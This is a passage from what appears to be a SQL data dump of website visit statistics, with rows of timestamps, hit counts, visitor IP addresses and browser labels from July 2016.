0961,1469119841,1,1,0,0,'95.133.150.166','chrome'),(50962,1469119864,1,0,1,0,'66.249.78.178',''),(50963,1469119949,1,1,0,0,'91.196.178.166','firefox'),(50964,1469120041,1,1,0,0,'178.92.158.158','chrome'),(50965,1469120219,1,1,0,0,'46.133.28.160','other'),(50966,1469120732,1,1,0,0,'94.178.7.27','chrome'),(50967,1469120800,1,1,0,0,'91.196.178.136','firefox'),(50968,1469120875,1,1,0,0,'37.73.222.94','chrome'),(50969,1469120940,1,1,0,0,'82.145.218.208','other'),(50970,1469121083,1,1,0,0,'207.46.13.138','other'),(50971,1469121092,1,0,1,0,'66.249.78.171',''),(50972,1469121146,1,1,0,0,'94.179.53.80','chrome'),(50973,1469121306,1,0,1,0,'66.249.78.164',''),(50974,1469121353,1,1,0,0,'193.108.50.236','chrome'),(50975,1469121404,1,1,0,0,'91.196.177.131','chrome'),(50976,1469121423,1,1,0,0,'109.57.138.109','chrome'),(50977,1469121468,1,1,0,0,'37.73.194.62','other'),(50978,1469121489,1,1,0,0,'46.133.252.65','other'),(50979,1469121666,1,1,0,0,'141.0.14.240','other'),(50980,1469121765,1,1,0,0,'195.88.158.126','chrome'),(50981,1469121798,1,1,0,0,'91.196.178.34','chrome'),(50982,1469121801,1,1,0,0,'207.46.13.118','other'),(50983,1469121810,1,1,0,0,'37.73.234.18','chrome'),(50984,1469121871,1,1,0,0,'91.196.178.131','chrome'),(50985,1469121909,1,1,0,0,'94.179.60.186','chrome'),(50986,1469122030,1,1,0,0,'91.196.178.72','chrome'),(50987,1469122103,1,1,0,0,'91.196.178.70','chrome'),(50988,1469122204,1,1,0,0,'82.145.219.92','other'),(50989,1469122308,1,1,0,0,'95.134.117.254','chrome'),(50990,1469122371,1,1,0,0,'91.196.178.132','chrome'),(50991,1469122373,1,1,0,0,'37.73.211.39','other'),(50992,1469122488,1,0,1,0,'66.249.69.185',''),(50993,1469122492,1,1,0,0,'37.73.247.97','chrome'),(50994,1469122627,1,1,0,0,'213.59.3.178','msie'),(50995,1469122633,1,1,0,0,'46.201.134.2','firefox'),(50996,1469122635,1,1,0,0,'37.73.243.227','other'),(50997,1469122674,1,1,0,0,'91.196.178.35','chrome'),(50998,1469122853,1,1,0,0,'46.211.155.147','chrome'),(50999,1469122956,2,2,0,0,'94.179.27.148','firefox'),(51000,1469122978,1,1,0,0,'168.235.206.199','other'),(51001,1469123003,2,0,2,0,'66.249.78.171',''),(51002,1469123209,1,1,0,0,'91.196.178.161','chrome'),(51003,1469123248,1,1,0,0,'92.113.156.3','chrome'),(51004,1469123260,1,1,0,0,'141.0.15.78','other'),(51005,1469123272,1,1,0,0,'91.196.178.65','chrome'),(51006,1469123519,1,1,0,0,'91.196.178.163','other'),(51007,1469123697,1,1,0,0,'37.73.229.165','other'),(51008,1469123772,1,0,1,0,'66.249.69.185',''),(51009,1469123857,1,1,0,0,'141.0.14.40','other'),(51010,1469123900,1,1,0,0,'91.196.178.165','chrome'),(51011,1469123999,1,1,0,0,'37.54.23.243','chrome'),(51012,1469124157,1,1,0,0,'178.92.8.200','chrome'),(51013,1469124212,1,1,0,0,'92.113.156.3','chrome'),(51014,1469124238,1,1,0,0,'141.0.14.116','other'),(51015,1469124247,1,1,0,0,'85.50.98.176','chrome'),(51016,1469124286,2,2,0,0,'213.179.252.180','chrome'),(51017,1469124331,1,1,0,0,'91.196.178.40','chrome'),(51018,1469124351,1,1,0,0,'82.145.209.53','other'),(51019,1469124387,1,1,0,0,'141.0.15.206','other'),(51020,1469124547,1,1,0,0,'46.211.3.196','chrome'),(51021,1469124568,1,1,0,0,'82.145.208.238','other'),(51022,1469124657,1,1,0,0,'78.111.185.190','other'),(51023,1469124680,1,1,0,0,'46.201.175.248','chrome'),(51024,1469124726,1,1,0,0,'193.227.207.46','other'),(51025,1469124881,1,1,0,0,'91.196.178.70','chrome'),(51026,1469124927,1,1,0,0,'37.53.231.95','chrome'),(51027,1469125055,1,1,0,0,'178.92.8.104','other'),(51028,1469125169,1,1,0,0,'46.211.155.147','chrome'),(51029,1469125170,1,1,0,0,'92.113.188.63','chrome'),(51030,1469125214,1,1,0,0,'37.73.253.154','chrome'),(51031,1469125226,1,1,0,0,'94.179.120.150','chrome'),(51032,1469125266,1,1,0,0,'94.179.66.64','chrome'),(51033,1469125302,1,1,0,0,'95.135.90.34','chrome'),(51034,1469125367,1,1,0,0,'91.196.178.68','chrome'),(51035,1469125512,1,1,0,0,'37.73.192.122','other'),(51036,1469125745,1,1,0,0,'178.92.170.9','chrome'),(51037,1469125909,1,1,0,0,'91.196.178.69','other'),(51038,1469125921,1,0,1,0,'66.249.78.150',''),(51039,1469126312,1,1,0,0,'95.132.181.28','chrome'),(51040,1469126339,1,1,0,0,'178.92.251.150','firefox'),(51041,1469126395,1,1,0,0,'176.38.114.54','chrome'),(51042,1469126424,1,1,0,0,'91.196.177.19','chrome'),(51043,1469126567,1,1,0,0,'46.211.5.245','chrome'),(51044,1469126631,1,1,0,0,'91.196.178.39','chrome'),(51045,1469126719,1,0,1,0,'66.249.78.143',''),(51046,1469126729,1,1,0,0,'109.251.106.38','other'),(51047,1469126837,1,1,0,0,'91.196.177.11','chrome'),(51048,1469127059,1,1,0,0,'37.73.236.105','chrome'),(51049,1469127129,1,1,0,0,'178.92.8.123','chrome'),(51050,1469127157,1,1,0,0,'37.73.195.58','chrome'),(51051,1469127405,1,1,0,0,'92.113.127.70','chrome'),(51052,1469127451,1,1,0,0,'91.196.178.99','other'),(51053,1469127514,1,1,0,0,'37.73.246.212','chrome'),(51054,1469127534,1,1,0,0,'91.196.178.132','chrome'),(51055,1469127552,1,1,0,0,'91.196.178.164','chrome'),(51056,1469127817,1,1,0,0,'37.53.122.152','chrome'),(51057,1469127941,1,1,0,0,'37.73.208.173','chrome'),(51058,1469127968,1,1,0,0,'91.196.178.100','other'),(51059,1469127980,1,0,1,0,'66.249.78.150',''),(51060,1469128083,1,1,0,0,'37.73.219.235','other'),(51061,1469128093,1,1,0,0,'95.133.238.203','chrome'),(51062,1469128237,1,1,0,0,'95.134.220.174','other'),(51063,1469128283,1,1,0,0,'178.93.150.87','chrome'),(51064,1469128395,1,1,0,0,'91.196.178.35','chrome'),(51065,1469128416,1,1,0,0,'91.196.178.168','chrome'),(51066,1469128568,1,1,0,0,'46.211.153.212','other'),(51067,1469128591,1,1,0,0,'93.76.37.248','chrome'),(51068,1469128693,1,1,0,0,'91.196.178.103','other'),(51069,1469128758,1,1,0,0,'207.46.13.127','other'),(51070,1469128802,1,1,0,0,'82.145.216.217','other'),(51071,1469128909,102,102,0,0,'123.2.148.62','other'),(51072,1469128941,1,1,0,0,'95.135.240.177','other'),(51073,1469129308,1,1,0,0,'212.90.62.211','chrome'),(51074,1469129454,1,1,0,0,'91.196.178.134','chrome'),(51075,1469129595,1,1,0,0,'178.92.8.15','chrome'),(51076,1469129611,1,1,0,0,'178.92.251.150','firefox'),(51077,1469129645,1,0,1,0,'66.249.78.136',''),(51078,1469129718,1,1,0,0,'130.180.212.149','chrome'),(51079,1469129902,1,1,0,0,'178.95.245.206','other'),(51080,1469130037,1,1,0,0,'37.53.230.121','other'),(51081,1469130372,1,1,0,0,'91.196.178.33','chrome'),(51082,1469130377,1,1,0,0,'178.95.157.192','chrome'),(51083,1469130563,1,1,0,0,'37.73.211.57','other'),(51084,1469130600,1,1,0,0,'8.37.233.244','other'),(51085,1469130601,1,1,0,0,'91.196.178.70','other'),(51086,1469130788,1,1,0,0,'46.133.3.228','other'),(51087,1469130847,1,1,0,0,'91.196.178.133','chrome'),(51088,1469130853,1,1,0,0,'37.73.236.28','chrome'),(51089,1469131046,1,1,0,0,'46.211.5.228','chrome'),(51090,1469131052,1,1,0,0,'92.113.191.40','other'),(51091,1469131058,1,0,1,0,'66.249.78.143',''),(51092,1469131089,1,1,0,0,'176.105.24.95','chrome'),(51093,1469131152,1,1,0,0,'91.196.178.39','chrome'),(51094,1469131291,1,1,0,0,'46.211.6.176','other'),(51095,1469131330,1,1,0,0,'37.73.244.59','chrome'),(51096,1469131360,1,1,0,0,'82.145.208.81','other'),(51097,1469131438,1,1,0,0,'92.112.124.129','chrome'),(51098,1469131449,1,1,0,0,'91.196.178.98','chrome'),(51099,1469131606,1,1,0,0,'178.92.251.150','firefox'),(51100,1469131625,1,1,0,0,'37.73.222.176','other'),(51101,1469131748,1,0,1,0,'66.249.78.178',''),(51102,1469131757,10,10,0,0,'69.58.178.59','firefox'),(51103,1469131778,1,1,0,0,'92.113.126.215','firefox'),(51104,1469131809,2,0,2,0,'66.249.78.171',''),(51105,1469131848,2,0,2,0,'66.249.78.164',''),(51106,1469131856,1,1,0,0,'91.196.178.71','chrome'),(51107,1469131941,1,1,0,0,'95.135.90.70','chrome'),(51108,1469131974,1,1,0,0,'46.118.92.159','chrome'),(51109,1469132068,1,1,0,0,'188.163.66.78','chrome'),(51110,1469132077,1,1,0,0,'91.124.119.173','chrome'),(51111,1469132175,1,1,0,0,'91.196.178.167','chrome'),(51112,1469132238,1,1,0,0,'37.73.220.204','chrome'),(51113,1469132611,1,1,0,0,'91.196.178.133','chrome'),(51114,1469132903,1,1,0,0,'82.145.216.199','other'),(51115,1469132917,1,1,0,0,'91.196.177.177','chrome'),(51116,1469133002,1,0,1,0,'66.249.78.150',''),(51117,1469133010,1,0,1,0,'66.249.78.136',''),(51118,1469133044,2,0,2,0,'66.249.78.178',''),(51119,1469133141,1,1,0,0,'37.55.58.189','chrome'),(51120,1469133302,1,1,0,0,'91.196.178.101','chrome'),(51121,1469133465,1,0,1,0,'66.249.78.171',''),(51122,1469133820,1,1,0,0,'91.196.178.69','other'),(51123,1469134159,1,0,1,0,'66.249.78.178',''),(51124,1469134213,1,1,0,0,'83.20.37.174','msie'),(51125,1469134299,1,1,0,0,'91.196.178.134','chrome'),(51126,1469134316,1,1,0,0,'91.196.178.129','chrome'),(51127,1469134466,1,1,0,0,'91.196.178.135','chrome'),(51128,1469134583,1,1,0,0,'82.145.209.223','other'),(51129,1469134913,1,1,0,0,'178.94.35.8','chrome'),(51130,1469135217,1,1,0,0,'91.196.178.167','chrome'),(51131,1469135515,1,1,0,0,'37.73.213.40','chrome'),(51132,1469135519,1,1,0,0,'151.80.31.159','other'),(51133,1469135720,1,1,0,0,'180.76.15.7','other'),(51134,1469135781,2,2,0,0,'91.196.178.37','chrome'),(51135,1469136042,2,2,0,0,'176.36.38.185','chrome'),(51136,1469136494,1,0,1,0,'66.249.78.164',''),(51137,1469136638,2,0,2,0,'66.249.78.171',''),(51138,1469136657,1,1,0,0,'82.145.219.60','other'),(51139,1469136674,1,1,0,0,'66.249.78.164','chrome'),(51140,1469136699,1,1,0,0,'213.179.252.45','chrome'),(51141,1469136740,1,1,0,0,'188.191.106.10','chrome'),(51142,1469136973,1,1,0,0,'91.196.178.161','firefox'),(51143,1469137012,1,1,0,0,'37.52.19.153','chrome'),(51144,1469137039,2,0,2,0,'66.249.78.178',''),(51145,1469137488,1,1,0,0,'141.0.14.38','other'),(51146,1469138028,1,1,0,0,'178.95.245.206','other'),(51147,1469138459,1,1,0,0,'93.72.115.4','chrome'),(51148,1469138482,1,1,0,0,'37.73.212.180','other'),(51149,1469138566,1,1,0,0,'91.196.178.163','chrome'),(51150,1469138933,1,0,1,0,'66.249.69.149',''),(51151,1469138954,1,1,0,0,'185.30.202.90','other'),(51152,1469139063,1,0,1,0,'66.249.78.136',''),(51153,1469139394,1,0,1,0,'66.249.78.150',''),(51154,1469140072,1,1,0,0,'141.0.15.205','other'),(51155,1469140170,1,0,1,0,'66.249.78.143',''),(51156,1469140330,1,1,0,0,'157.55.39.144','other'),(51157,1469140405,1,0,1,0,'66.249.78.150',''),(51158,1469140696,1,1,0,0,'37.73.222.142','other'),(51159,1469140772,1,0,1,0,'66.249.78.178',''),(51160,1469140874,1,0,1,0,'66.249.69.185',''),(51161,1469141010,1,1,0,0,'37.73.200.252','chrome'),(51162,1469141818,1,1,0,0,'91.196.178.100','chrome'),(51163,1469142326,1,1,0,0,'91.196.178.130','chrome'),(51164,1469142370,3,0,3,0,'66.249.78.143',''),(51165,1469142430,3,0,3,0,'66.249.78.136',''),(51166,1469143080,1,0,1,0,'66.249.78.164',''),(51167,1469144956,1,1,0,0,'94.179.5.125','chrome'),(51168,1469145071,1,0,1,0,'66.249.78.178',''),(51169,1469145479,1,1,0,0,'130.193.51.19','other'),(51170,1469145595,1,1,0,0,'207.46.13.138','other'),(51171,1469147017,1,1,0,0,'66.249.78.178','chrome'),(51172,1469147121,1,0,1,0,'66.249.78.136',''),(51173,1469147429,1,1,0,0,'66.249.78.164','chrome'),(51174,1469147649,1,1,0,0,'157.55.39.144','other'),(51175,1469148044,1,1,0,0,'208.115.113.92','other'),(51176,1469148091,1,1,0,0,'207.46.13.118','other'),(51177,1469148295,2,0,2,0,'66.249.78.178',''),(51178,1469148321,1,0,1,0,'66.249.69.152',''),(51179,1469149212,1,1,0,0,'66.249.78.164','chrome'),(51180,1469149719,1,0,1,0,'66.249.78.136',''),(51181,1469150340,1,0,1,0,'66.249.78.164',''),(51182,1469150428,1,1,0,0,'208.115.113.92','other'),(51183,1469150954,1,1,0,0,'47.16.91.216','chrome'),(51184,1469152068,1,1,0,0,'66.249.78.136','chrome'),(51185,1469152239,1,1,0,0,'66.249.78.164','chrome'),(51186,1469152650,1,1,0,0,'212.22.197.111','chrome'),(51187,1469152657,1,1,0,0,'141.8.142.67','other'),(51188,1469152950,2,0,2,0,'66.249.78.150',''),(51189,1469153732,1,0,1,0,'66.249.78.171',''),(51190,1469153989,1,1,0,0,'46.133.182.121','chrome'),(51191,1469154228,1,0,1,0,'66.249.78.164',''),(51192,1469154271,1,1,0,0,'66.249.78.164','chrome'),(51193,1469155002,1,1,0,0,'66.249.93.90','chrome'),(51194,1469155522,1,0,1,0,'66.249.78.150',''),(51195,1469155810,1,0,1,0,'66.249.78.136',''),(51196,1469156365,1,0,1,0,'66.249.78.164',''),(51197,1469156609,1,1,0,0,'180.76.15.142','other'),(51198,1469158687,1,0,1,0,'66.249.78.171',''),(51199,1469158894,1,1,0,0,'82.145.209.219','other'),(51200,1469159292,1,0,1,0,'66.249.78.164',''),(51201,1469159735,1,1,0,0,'37.73.234.156','chrome'),(51202,1469159929,1,1,0,0,'66.249.78.143','chrome'),(51203,1469161278,1,1,0,0,'168.235.206.76','other'),(51204,1469161437,1,1,0,0,'82.145.216.126','other'),(51205,1469161973,2,0,2,0,'66.249.78.143',''),(51206,1469162016,1,0,1,0,'66.249.78.178',''),(51207,1469162185,1,1,0,0,'91.196.178.38','chrome'),(51208,1469162195,1,0,1,0,'66.249.78.164',''),(51209,1469162568,1,1,0,0,'91.196.178.37','other'),(51210,1469162643,1,1,0,0,'141.0.15.242','other'),(51211,1469162946,1,1,0,0,'130.193.51.79','other'),(51212,1469163387,1,1,0,0,'37.73.159.167','chrome'),(51213,1469163651,1,1,0,0,'81.23.24.139','chrome'),(51214,1469163959,1,0,1,0,'66.249.78.136',''),(51215,1469164179,1,1,0,0,'91.196.178.67','chrome'),(51216,1469164243,1,1,0,0,'37.73.240.71','chrome'),(51217,1469164666,1,1,0,0,'95.135.213.4','chrome'),(51218,1469164739,1,1,0,0,'91.196.178.67','firefox'),(51219,1469165051,1,0,1,0,'66.249.78.178',''),(51220,1469165083,1,0,1,0,'66.249.78.164',''),(51221,1469165541,1,1,0,0,'91.196.178.66','other'),(51222,1469165647,1,1,0,0,'37.73.244.168','chrome'),(51223,1469165817,1,1,0,0,'66.249.93.113','chrome'),(51224,1469165837,1,1,0,0,'37.73.252.53','chrome'),(51225,1469166008,1,1,0,0,'91.196.178.69','chrome'),(51226,1469166064,1,1,0,0,'37.73.219.13','chrome'),(51227,1469166603,1,1,0,0,'91.196.178.162','chrome'),(51228,1469166812,1,1,0,0,'207.46.13.118','other'),(51229,1469166951,1,1,0,0,'164.132.161.89','other'),(51230,1469167142,1,1,0,0,'91.196.178.135','other'),(51231,1469167282,1,1,0,0,'37.53.227.17','chrome'),(51232,1469167294,1,1,0,0,'46.211.253.57','chrome'),(51233,1469167649,1,1,0,0,'91.196.178.70','other'),(51234,1469167761,1,1,0,0,'37.73.238.218','chrome'),(51235,1469167972,1,1,0,0,'91.196.177.93','chrome'),(51236,1469168189,1,1,0,0,'95.134.116.40','chrome'),(51237,1469168253,1,1,0,0,'91.196.178.164','other'),(51238,1469168423,1,1,0,0,'180.76.15.157','other'),(51239,1469168424,1,1,0,0,'180.76.15.148','other'),(51240,1469168563,1,1,0,0,'82.207.120.65','chrome'),(51241,1469168687,1,1,0,0,'91.196.178.67','chrome'),(51242,1469168786,1,1,0,0,'37.52.20.63','chrome'),(51243,1469168940,1,1,0,0,'91.124.180.10','chrome'),(51244,1469168967,1,1,0,0,'91.196.177.92','chrome'),(51245,1469169160,1,1,0,0,'176.36.145.138','chrome'),(51246,1469169279,1,1,0,0,'66.249.78.150','chrome'),(51247,1469169620,1,0,1,0,'66.249.78.164',''),(51248,1469169704,1,1,0,0,'213.179.252.58','chrome'),(51249,1469169843,1,1,0,0,'37.55.251.69','chrome'),(51250,1469170097,1,1,0,0,'95.133.150.255','other'),(51251,1469170105,1,1,0,0,'91.124.55.28','chrome'),(51252,1469170480,1,1,0,0,'207.46.13.118','other'),(51253,1469170786,1,1,0,0,'193.93.228.47','chrome'),(51254,1469171074,1,1,0,0,'82.145.219.110','other'),(51255,1469171076,1,1,0,0,'213.108.41.140','chrome'),(51256,1469171161,1,1,0,0,'195.211.175.37','chrome'),(51257,1469171240,1,1,0,0,'82.207.91.234','firefox'),(51258,1469171437,2,2,0,0,'178.92.8.200','chrome'),(51259,1469171573,1,0,1,0,'66.249.78.178',''),(51260,1469171610,1,1,0,0,'37.54.19.112','chrome'),(51261,1469171712,1,1,0,0,'37.53.122.15','chrome'),(51262,1469171864,1,1,0,0,'141.0.15.76','other'),(51263,1469172251,1,1,0,0,'91.196.178.67','chrome'),(51264,1469172386,1,1,0,0,'91.196.178.132','firefox'),(51265,1469172612,1,1,0,0,'37.73.172.234','other'),(51266,1469172957,1,0,1,0,'66.249.78.143',''),(51267,1469173080,1,1,0,0,'37.73.185.149','other'),(51268,1469173322,1,1,0,0,'178.92.8.200','chrome'),(51269,1469173449,1,1,0,0,'37.73.199.161','chrome'),(51270,1469173625,1,1,0,0,'91.196.178.166','chrome'),(51271,1469173754,1,1,0,0,'180.76.15.148','other'),(51272,1469174172,2,2,0,0,'91.196.178.169','chrome'),(51273,1469174570,1,1,0,0,'178.92.8.200','chrome'),(51274,1469175142,1,1,0,0,'51.255.65.81','other'),(51275,1469175236,2,2,0,0,'37.53.122.15','chrome'),(51276,1469175249,1,1,0,0,'195.211.23.206','chrome'),(51277,1469175416,1,1,0,0,'151.80.31.174','other'),(51278,1469175536,1,1,0,0,'94.76.100.156','chrome'),(51279,1469175543,1,1,0,0,'91.124.183.3','chrome'),(51280,1469175595,1,1,0,0,'157.55.39.144','other'),(51281,1469175991,1,1,0,0,'37.52.21.115','chrome'),(51282,1469176055,1,1,0,0,'37.53.230.44','chrome'),(51283,1469176139,1,0,1,0,'66.249.78.136',''),(51284,1469176205,1,0,1,0,'66.249.78.150',''),(51285,1469176566,1,1,0,0,'94.179.87.199','firefox'),(51286,1469177220,1,1,0,0,'91.196.178.69','chrome'),(51287,1469177495,1,1,0,0,'193.108.50.236','chrome'),(51288,1469177881,1,0,1,0,'66.249.78.178',''),(51289,1469178341,1,1,0,0,'130.193.51.19','other'),(51290,1469178402,1,0,1,0,'66.249.78.136',''),(51291,1469178415,1,1,0,0,'91.196.178.33','chrome'),(51292,1469179038,1,0,1,0,'68.180.230.111',''),(51293,1469179426,1,1,0,0,'37.52.245.139','chrome'),(51294,1469179591,1,1,0,0,'130.180.220.131','chrome'),(51295,1469179715,1,1,0,0,'82.145.218.155','other'),(51296,1469179913,1,1,0,0,'91.196.178.66','firefox'),(51297,1469179927,1,1,0,0,'213.108.41.140','chrome'),(51298,1469179978,1,1,0,0,'164.132.161.55','other'),(51299,1469180086,1,1,0,0,'178.92.8.200','chrome'),(51300,1469180100,1,1,0,0,'195.211.175.37','chrome'),(51301,1469180989,2,2,0,0,'91.196.178.69','firefox'),(51302,1469181503,1,1,0,0,'37.55.237.18','chrome'),(51303,1469181702,1,1,0,0,'178.92.8.200','chrome'),(51304,1469182396,1,1,0,0,'164.132.161.70','other'),(51305,1469182581,1,1,0,0,'91.196.178.66','firefox'),(51306,1469182636,1,1,0,0,'91.196.178.69','firefox'),(51307,1469183786,1,1,0,0,'37.73.189.11','chrome'),(51308,1469184021,1,1,0,0,'91.196.177.20','chrome'),(51309,1469184169,1,1,0,0,'91.196.178.67','firefox'),(51310,1469184223,1,1,0,0,'66.249.78.150','chrome'),(51311,1469184839,1,1,0,0,'94.179.123.129','chrome'),(51312,1469184871,1,1,0,0,'91.196.178.101','chrome'),(51313,1469184958,1,1,0,0,'46.133.186.106','other'),(51314,1469184966,1,0,1,0,'66.249.78.171',''),(51315,1469185015,1,1,0,0,'141.8.142.67','other'),(51316,1469185019,1,1,0,0,'130.193.51.19','other'),(51317,1469185057,1,1,0,0,'66.249.78.143','chrome'),(51318,1469185285,1,0,1,0,'66.249.78.150',''),(51319,1469185536,1,0,1,0,'66.249.78.178',''),(51320,1469185678,1,1,0,0,'180.76.15.8','other'),(51321,1469186125,1,1,0,0,'92.113.20.39','chrome'),(51322,1469186214,1,1,0,0,'66.249.78.136','chrome'),(51323,1469186446,1,1,0,0,'46.201.175.126','chrome'),(51324,1469186467,1,1,0,0,'130.193.51.14','other'),(51325,1469186475,1,1,0,0,'66.249.78.143','chrome'),(51326,1469186489,1,1,0,0,'66.249.78.171','chrome'),(51327,1469186637,1,1,0,0,'91.196.178.162','chrome'),(51328,1469186683,1,1,0,0,'66.249.78.150','chrome'),(51329,1469187375,1,1,0,0,'130.193.50.34','other'),(51330,1469187379,1,1,0,0,'141.8.183.25','other'),(51331,1469187662,1,0,1,0,'66.249.78.171',''),(51332,1469187818,1,1,0,0,'91.196.178.67','firefox'),(51333,1469187918,1,1,0,0,'178.95.247.53','firefox'),(51334,1469188048,1,1,0,0,'66.249.78.143','chrome'),(51335,1469188327,1,1,0,0,'81.23.24.138','other'),(51336,1469188576,1,1,0,0,'141.0.14.106','other'),(51337,1469188822,1,1,0,0,'66.249.78.150','chrome'),(51338,1469189522,2,2,0,0,'91.196.178.69','firefox'),(51339,1469189575,1,1,0,0,'93.137.0.254','chrome'),(51340,1469189681,1,1,0,0,'130.193.50.34','other'),(51341,1469189775,1,0,1,0,'66.249.78.150',''),(51342,1469189803,1,1,0,0,'130.193.51.19','other'),(51343,1469190335,1,1,0,0,'212.55.75.197','chrome'),(51344,1469190572,1,1,0,0,'46.133.77.134','other'),(51345,1469190660,1,1,0,0,'37.57.121.240','chrome'),(51346,1469190744,1,1,0,0,'130.193.51.79','other'),(51347,1469191082,1,1,0,0,'91.124.61.2','chrome'),(51348,1469191110,1,1,0,0,'130.193.50.34','other'),(51349,1469191389,1,0,1,0,'66.249.78.164',''),(51350,1469191550,1,1,0,0,'66.249.78.171','chrome'),(51351,1469191947,1,1,0,0,'91.196.178.65','firefox'),(51352,1469192439,1,1,0,0,'82.145.209.200','other'),(51353,1469192763,1,1,0,0,'37.53.229.126','chrome'),(51354,1469192873,1,1,0,0,'91.196.178.161','firefox'),(51355,1469193162,1,1,0,0,'91.124.239.167','firefox'),(51356,1469193911,1,1,0,0,'37.73.235.230','other'),(51357,1469194097,1,1,0,0,'141.8.142.67','other'),(51358,1469194186,1,1,0,0,'46.118.195.79','chrome'),(51359,1469194215,1,1,0,0,'37.53.93.189','chrome'),(51360,1469194485,1,1,0,0,'207.46.13.138','other'),(51361,1469194584,2,2,0,0,'141.8.142.61','other'),(51362,1469194748,1,1,0,0,'91.196.178.33','firefox'),(51363,1469195049,2,2,0,0,'141.8.183.25','other'),(51364,1469195520,1,1,0,0,'207.46.13.118','other'),(51365,1469195547,1,0,1,0,'66.249.78.178',''),(51366,1469195597,1,1,0,0,'5.45.192.68','chrome'),(51367,1469195629,1,1,0,0,'159.224.216.8','chrome'),(51368,1469196357,1,1,0,0,'91.196.178.72','firefox'),(51369,1469196381,2,2,0,0,'130.193.51.19','other'),(51370,1469196975,1,1,0,0,'164.132.161.73','other'),(51371,1469197002,1,1,0,0,'141.8.183.25','other'),(51372,1469197493,1,1,0,0,'92.113.156.3','chrome'),(51373,1469197550,1,1,0,0,'92.112.202.15','other'),(51374,1469198187,1,1,0,0,'91.196.178.69','firefox'),(51375,1469198269,1,1,0,0,'91.124.239.167','firefox'),(51376,1469200623,1,1,0,0,'37.73.153.176','other'),(51377,1469202273,1,0,1,0,'66.249.78.178',''),(51378,1469202279,1,1,0,0,'94.254.242.75','chrome'),(51379,1469202425,1,1,0,0,'193.151.13.51','chrome'),(51380,1469202654,1,1,0,0,'104.132.20.84','chrome'),(51381,1469203051,2,0,2,0,'66.249.78.143',''),(51382,1469203081,2,0,2,0,'66.249.78.171',''),(51383,1469203098,23,0,23,0,'66.249.78.136',''),(51384,1469203428,3,0,3,0,'66.249.78.178',''),(51385,1469203507,1,1,0,0,'130.193.50.34','other'),(51386,1469203544,1,1,0,0,'91.196.178.70','chrome'),(51387,1469203765,1,0,1,0,'66.249.78.150',''),(51388,1469204135,1,1,0,0,'91.124.239.167','firefox'),(51389,1469204367,1,0,1,0,'66.249.78.136',''),(51390,1469204769,1,0,1,0,'66.249.78.171',''),(51391,1469204825,2,2,0,0,'66.249.78.136','chrome'),(51392,1469204952,1,1,0,0,'91.196.178.38','chrome'),(51393,1469205066,2,2,0,0,'66.249.78.150','chrome'),(51394,1469205539,1,1,0,0,'66.102.8.187','other'),(51395,1469205550,1,1,0,0,'66.249.78.143','chrome'),(51396,1469205702,1,1,0,0,'51.255.65.54','other'),(51397,1469205799,4,4,0,0,'66.249.78.136','chrome'),(51398,1469206081,1,1,0,0,'66.249.78.150','chrome'),(51399,1469206127,1,1,0,0,'141.8.142.58','other'),(51400,1469206192,1,0,1,0,'66.249.78.164',''),(51401,1469206489,1,1,0,0,'91.196.178.165','other'),(51402,1469206834,1,1,0,0,'138.201.125.143','other'),(51403,1469206862,1,1,0,0,'91.124.239.167','firefox'),(51404,1469206973,1,1,0,0,'66.249.78.164','chrome'),(51405,1469207103,1,1,0,0,'92.113.127.237','chrome'),(51406,1469207366,1,1,0,0,'66.249.78.143','chrome'),(51407,1469208393,1,1,0,0,'91.124.183.181','other'),(51408,1469208418,1,1,0,0,'94.179.69.244','opera'),(51409,1469208703,1,1,0,0,'141.0.13.214','chrome'),(51410,1469208807,2,2,0,0,'78.46.50.246','other'),(51411,1469208851,1,1,0,0,'66.249.78.150','chrome'),(51412,1469208971,3,2,1,0,'66.249.78.143',''),(51413,1469209539,1,1,0,0,'207.46.13.118','other'),(51414,1469209792,1,1,0,0,'91.196.178.166','chrome'),(51415,1469209914,3,2,1,0,'66.249.78.143',''),(51416,1469210305,1,1,0,0,'141.0.13.214','chrome'),(51417,1469210349,2,0,2,0,'66.249.78.164',''),(51418,1469210898,1,0,1,0,'66.249.78.178',''),(51419,1469211389,1,1,0,0,'91.196.178.68','chrome'),(51420,1469211486,1,1,0,0,'91.196.178.166','chrome'),(51421,1469211549,1,0,1,0,'66.249.78.171',''),(51422,1469212035,1,1,0,0,'91.124.239.167','firefox'),(51423,1469212248,1,1,0,0,'178.150.158.154','firefox'),(51424,1469212532,1,1,0,0,'91.238.95.146','chrome'),(51425,1469213031,1,0,1,0,'66.249.78.178',''),(51426,1469213054,1,1,0,0,'91.196.178.99','chrome'),(51427,1469213223,1,1,0,0,'91.196.178.33','other'),(51428,1469213265,1,0,1,0,'66.249.78.171',''),(51429,1469213854,1,1,0,0,'141.8.142.61','other'),(51430,1469214014,1,1,0,0,'95.134.169.193','firefox'),(51431,1469214266,1,1,0,0,'91.124.239.167','firefox'),(51432,1469214512,1,1,0,0,'94.179.37.19','firefox'),(51433,1469214516,2,2,0,0,'91.196.178.99','chrome'),(51434,1469214735,1,1,0,0,'37.73.202.4','chrome'),(51435,1469214904,1,1,0,0,'207.46.13.118','other'),(51436,1469215187,1,1,0,0,'141.8.183.25','other'),(51437,1469215197,1,1,0,0,'91.196.178.103','chrome'),(51438,1469215526,1,1,0,0,'91.196.178.99','chrome'),(51439,1469215543,1,0,1,0,'66.249.78.164',''),(51440,1469215581,1,0,1,0,'66.249.78.171',''),(51441,1469215601,1,1,0,0,'130.193.50.34','other'),(51442,1469215832,1,1,0,0,'130.193.51.19','other'),(51443,1469216239,1,1,0,0,'141.0.12.125','chrome'),(51444,1469216241,1,1,0,0,'66.249.78.150','chrome'),(51445,1469216546,1,1,0,0,'91.196.178.70','chrome'),(51446,1469217449,1,1,0,0,'91.196.178.70','chrome'),(51447,1469217811,1,0,1,0,'66.249.78.150',''),(51448,1469217832,3,3,0,0,'141.8.183.25','other'),(51449,1469218088,1,1,0,0,'130.193.50.34','other'),(51450,1469218539,1,1,0,0,'141.8.142.58','other'),(51451,1469218584,1,0,1,0,'68.180.230.111',''),(51452,1469218655,1,0,1,0,'66.249.78.164',''),(51453,1469218674,1,1,0,0,'141.8.142.61','other'),(51454,1469219054,1,0,1,0,'66.249.78.171',''),(51455,1469219110,1,0,1,0,'66.249.78.143',''),(51456,1469219190,2,1,1,0,'66.249.78.143',''),(51457,1469219285,1,1,0,0,'82.145.222.70','chrome'),(51458,1469219311,1,1,0,0,'141.8.183.25','other'),(51459,1469219407,2,0,2,0,'66.249.78.150',''),(51460,1469219436,1,1,0,0,'130.193.50.34','other'),(51461,1469219529,1,1,0,0,'46.211.18.33','other'),(51462,1469219561,1,1,0,0,'141.8.142.58','other'),(51463,